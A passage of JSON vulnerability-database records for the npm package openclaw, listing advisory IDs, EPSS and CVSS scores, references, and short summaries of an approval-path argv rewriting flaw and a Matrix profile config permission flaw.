k-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["GHSA-fqrj-m88p-qf3v"],"risk_score":1.4,"exploitability":"0.5","weighted_severity":"2.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-q9jf-srt4-fbcg"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50527?format=json","vulnerability_id":"VCID-qahm-7zt5-fqcg","summary":"OpenClaw's Node system.run approval hardening wrapper semantic drift can execute unintended local scripts\nIn `openclaw@2026.3.1`, node `system.run` approval-path hardening rewrote wrapper command argv in a way that changed execution semantics. A command shown/approved as a shell payload (for example `echo SAFE`) could execute a different local script when wrapper argv were rewritten.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-29608","reference_id":"","reference_type":"","scores":[{"value":"0.00025","scoring_system":"epss","scoring_elements":"0.07491","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00025","scoring_system":"epss","scoring_elements":"0.07513","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00025","scoring_system":"epss","scoring_elements":"0.07505","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-29608"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/dded569626b0d8e7bdab10b5e7528b6caf73a0f1","reference_id":"","reference_type":"","scores":[{"value":"6.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-19T16:09:30Z/"}],"url":"https://github.com/openclaw/openclaw/commit/dded569626b0d8e7bdab10b5e7528b6caf73a0f1"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-approval-integrity-bypass-via-system-run-argv-rewriting","reference_id":"","reference_type":"","scores":[{"value":"6.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-19T16:09:30Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-approval-integrity-bypass-via-system-run-argv-rewriting"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-29608","reference_id":"CVE-2026-29608","reference_type":"","scores":[{"value":"6.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-29608"},{"reference_url":"https://github.com/advisories/GHSA-h3rm-6x7g-882f","reference_id":"GHSA-h3rm-6x7g-882f","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-h3rm-6x7g-882f"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-h3rm-6x7g-882f","reference_id":"GHSA-h3rm-6x7g-882f","reference_type":"","scores":[{"value":"6.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-19T16:09:30Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-h3rm-6x7g-882f"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74401?format=json","purl":"pkg:npm/openclaw@2026.3.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.2"}],"aliases":["CVE-2026-29608","GHSA-h3rm-6x7g-882f"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qahm-7zt5-fqcg"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90075?format=json","vulnerability_id":"VCID-qedr-a3ay-v3gx","summary":"OpenClaw: Matrix profile config persistence was reachable from operator.write message tools\n## Summary\n\nMatrix profile config persistence was reachable from operator.write message tools.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nGateway `operator.write` message-tool paths could reach Matrix profile persistence that should have required admin-level authority.\n\n## Technical Details\n\nThe fix gates Matrix profile updates for non-owner message-tool runs and prevents write-scoped callers from mutating persistent profile config.\n\n## Fix\n\nThe issue was fixed in #62662. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `fe0f686c9228fffcec6de4011da45e69a6e23e54`\n- PR: #62662\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zpbrent and @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42433","reference_id":"","reference_type":"","scores":[{"value":"0.00028","scoring_system":"epss","scoring_elements":"0.08411","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00032","scoring_system":"epss","scoring_elements":"0.09776","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00032","scoring_system":"epss","scoring_elements":"0.09802","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42433"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/fe0f686c9228fffcec6de4011da45e69a6e23e54","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T13:48:50Z/"}],"url":"https://github.com/openclaw/openclaw/commit/fe0f686c9228fffcec6de4011da45e69a6e23e54"},{"reference_url":"https://github.com/openclaw/openclaw/pull/62662","reference_id":"","reference_type":"","scores":[{"value":"6.5","scorin